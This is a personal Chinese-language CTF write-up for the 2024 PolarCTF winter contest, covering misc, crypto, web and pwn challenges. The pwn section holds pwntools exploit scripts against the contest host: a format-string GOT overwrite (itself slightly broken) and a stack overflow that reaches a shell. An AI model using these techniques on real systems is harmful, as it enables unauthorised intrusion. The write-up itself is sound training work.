2024PolarCTF冬季赛个人WP

ljnljn Lv6
  2024-12-08 18:17 2024-12-08 18:17 创建   2026-05-25 22:04:46 2026-05-25 22:04:46 更新      883 字  4 分钟  

1.Misc

1-1 Sign-in questions

本题思路如下:
对mp3文件进行binwalk提取获得一个rar文件
里面有key.txt和公众号二维码
获得flag
image

1-6 妖精纪元

本题思路如下:
解压发现一个加密的压缩包和一个docx文件
尝试对文档进行binwalk提取,获得2BF5.rar
之后出现一个“凝固的岁月.exe”,打开,发现图标是很明显的Tkinter默认图标,可以判断这是Python程序编译成exe后的结果
image

随后使用pyinstxtractor-ng.py和pycdc.exe对程序进行逆向
image

成功后打开x.py,发现有一长串base64编码,分析代码可以得知这是图片的base64编码。
使用在线工具base64转图片,得到图片后用binwalk提取出“走入深渊的辞行.mp3”文件。
使用audacity查看音频文件,可以看出来这是摩尔斯密码,肉眼转成摩尔斯密码
image
得出压缩包密码:YOU‘VEH@D@1ONGD@Y

image

2 Crypto

2-3 幂数加密了解一下

本题思路如下:

1
2
3
4
5
6
7
8
9
ciphertext = "44420122088421088810140108442"
ciphertext = ciphertext.split('0') 
result = ""
for block in ciphertext:    
    sum = 0
    for i in   range(len(block)):  
        sum +=   int(block[i])
    result += chr(65 +   sum - 1)  
print(result)

image

3.Web

3-2 井字棋

本题思路如下:
审计代码后不难发现,只需要修改origboard的值强制把自己的棋子放上即可胜利,因此执行如下代码即可。

1
2
3
4
5
6
origBoard[3]='O';
document.getElementById('3').innerHTML   ='O';
origBoard[4]='O';
document.getElementById('4').innerHTML   ='O';
origBoard[5]='O';
document.getElementById('5').innerHTML   ='O';

其中下面代码是显示O的,上面是修改结果
image

3-3 button

本题思路如下:
打开发现是个按不到的按钮,因此看源代码,发现这个位置很可疑,因此尝试进入
image

打开页面一片空白,发现flag在注释里

image

4.Pwn

1、bllbl_bind_calc

没有附件,直接手搓脚本
第一次成功发现打520次就能获得flag
Exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from pwn import *
import time
p=remote("1.95.36.136",2144)

p.sendline("haha")
p.sendline("2")
p.sendline("22")

for i in range(510):
        p.recvuntil('看看这道题怎么样:')
        temp = p.recvuntil(b'=')
        temp=temp.decode().replace("="," ")
        ans = eval(temp)
        p.sendline(str(ans))
        p.sendline(' ')
        print(temp,ans,i)
        time.sleep(1)
p.interactive()

最后几次手打答案能获得flag(不知道为什么总是卡住)
image

2、tangniu

本题思路如下:
格式化字符串漏洞,偏移为7,用fmtstrpayload,改printf的got表为system的plt表即可
image
发现打的aaaa(0x61616161)是第七位,因此可以确定偏移为7
Exp:

1
2
3
4
5
6
7
8
9
10
11
12
from pwn import *
p=remote('1.95.36.136',2123)

elf = ELF('./tangniu')
printf_got = elf.got['printf']
system_plt = elf.plt['system']

io.sendline(b’s’)

payload = fmtstr_payload(7, {printf_got: system_plt})
p.sendline(payload)
p.interactive()

image

3、stack

本题思路如下:
IDA放进去

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
__int64 test1()
{
  _BYTE buf[80]; //   [rsp+0h] [rbp-50h] BYREF
 
  read(0, buf,   0x58uLL);
  return 0LL;
}
int __fastcall main(int argc, const char **argv, const char   **envp)
{
  int v4; // [rsp+Ch]   [rbp-4h] BYREF
 
  init(argc, argv,   envp);
  test1();
    puts("input1:");
    __isoc99_scanf("%d", &v4);
  if ( passwd == 4660   && v4 == 4660 )
      system("/bin/sh");
  return 0;
}

如果想要执行指令,那么passwd和v4的值应该为4660,转16进制是0x1234
main函数里面的好写入,直接str(0x1234)即可,
然后看passwd,没有直接的赋值写入,但是test1存在栈溢出,因此利用栈溢出来覆盖return到passwd的地址

image

exp:

1
2
3
4
5
6
7
8
from pwn import *
p=remote('1.95.36.136',2094)
#p=process('./pwn')
payload=b'a'*0x50+p64(0x04033CC+4)
p.send(payload)
p.recvuntil(':')
p.sendline(str(0x1234))
p.interactive()

image

  • 标题: 2024PolarCTF冬季赛个人WP
  • 作者: ljnljn
  • 创建于 : 2024-12-08 18:17:00
  • 更新于 : 2026-05-25 22:04:46
  • 链接: https://ljnljn2005.github.io/2024/12/08/2024PolarCTF冬季赛个人WP/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
目录
2024PolarCTF冬季赛个人WP
  1. 1.Misc
    1. 1-1 Sign-in questions
    2. 1-6 妖精纪元
  2. 2 Crypto
    1. 2-3 幂数加密了解一下
  3. 3.Web
    1. 3-2 井字棋
    2. 3-3 button
  4. 4.Pwn
    1. 1、bllbl_bind_calc
    2. 2、tangniu
    3. 3、stack